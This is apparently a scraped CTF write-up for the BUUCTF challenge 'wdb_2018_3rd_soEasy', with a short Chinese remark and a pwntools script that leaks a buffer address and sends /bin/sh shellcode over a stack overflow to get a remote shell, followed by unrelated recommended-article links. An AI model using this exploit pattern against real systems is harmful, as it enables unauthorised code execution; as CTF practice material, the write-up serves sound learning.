wdb_2018_3rd_soEasy
2024-06-12 13:24:27
wdb_2018_3rd_soEasy
查看保护
很明显的一道shellcode题目,0x48的大小的话直接用pwntools的shellcode即可。
from pwn import *context(arch='i386', os='linux', log_level='debug')file_name = './z1r0'debug = 1
if debug:r = remote('node4.buuoj.cn', 26049)
else:r = process(file_name)elf = ELF(file_name)def dbg():gdb.attach(r)r.recvuntil('0x')
buf = int(r.recv(8), 16)
success('buf = ' + hex(buf))shellcode = asm(shellcraft.sh())p1 = shellcode.ljust(0x48, b'a') + b'a' * 4 + p32(buf)r.sendline(p1)r.interactive()
wdb_2018_3rd_soEasy相关推荐
- PWN-PRACTICE-BUUCTF-30
PWN-PRACTICE-BUUCTF-30 suctf_2018_stack wdb_2018_3rd_soEasy [BSidesCF 2019]Runit qctf2018_stack2 suc ...
- BUUCTF-pwn(15)
gyctf_2020_some_thing_interesting 经典UAF漏洞! Allocate申请函数! Free释放函数! 全保护开启,故我们利用格式化字符串漏洞泄露libc地址,从而得到m ...
最新文章
- 哪种营销方法效果最差_营销软文写作的三大技巧,你知道吗?
- GO语言基础之reflect反射
- 源代码阅读工具Source-Navigator 在ubuntu 9.04下的安装与问题解决
- 第一章 1 常用库之time
- 线上python课程一般多少钱-python学习费用多少合适
- 人工神经网络算法有哪些,人工神经网络算法优点
- 微信最新的系统默认emoji表情集
- java秒杀源码_Java秒杀系统实战系列~商品秒杀代码实战
- 机器学习:支持向量机
- windows 驱动开发基础(二)事件通知---关于irp处理,DPC,链表等
- GEE实现图像随机森林分类
- CISCO服务器配置RAID步骤
- Tomcat 基础配置
- 华为国产系统Android,国产手机系统即将出现!华为将抛弃安卓:成功研发自有手机系统...
- 鸭子的应聘,我是学c++的
- 【21岁扶墙当CTO】之无人机篇(2/n)
- iOS 二维码ZBarSDK类似微信的扫一扫
- 分享网页文章到微信时如何自定义缩略图、链接、标题和摘要
- HTML5怎么输入特殊符号,html5特殊符号
- 数字IC前端学习笔记:LSFR(线性反馈移位寄存器)
热门文章
- EAS Web:新增按钮弹出新页签
- 微软OpenPAI平台搭建指南
- 3GPP TS 29244-g30 中英文对照 | 5.4.14 Deferred PDR activation and deactivation
- Matlab求解微分方程数值解
- c语言13 6,C语言学习笔记13
- ORACLE 参数 O7_DICTIONARY_ACCESSIBILITY
- 哪款蓝牙耳机的音质好?盘点四款高颜值蓝牙耳机
- SSM+社区线上超市购物系统 毕业设计-附源码211704
- uni-app框架调研
- jetson xiaver NX 安装tensorflow object detection api 遇到的tensorflow-addons 不能安装问题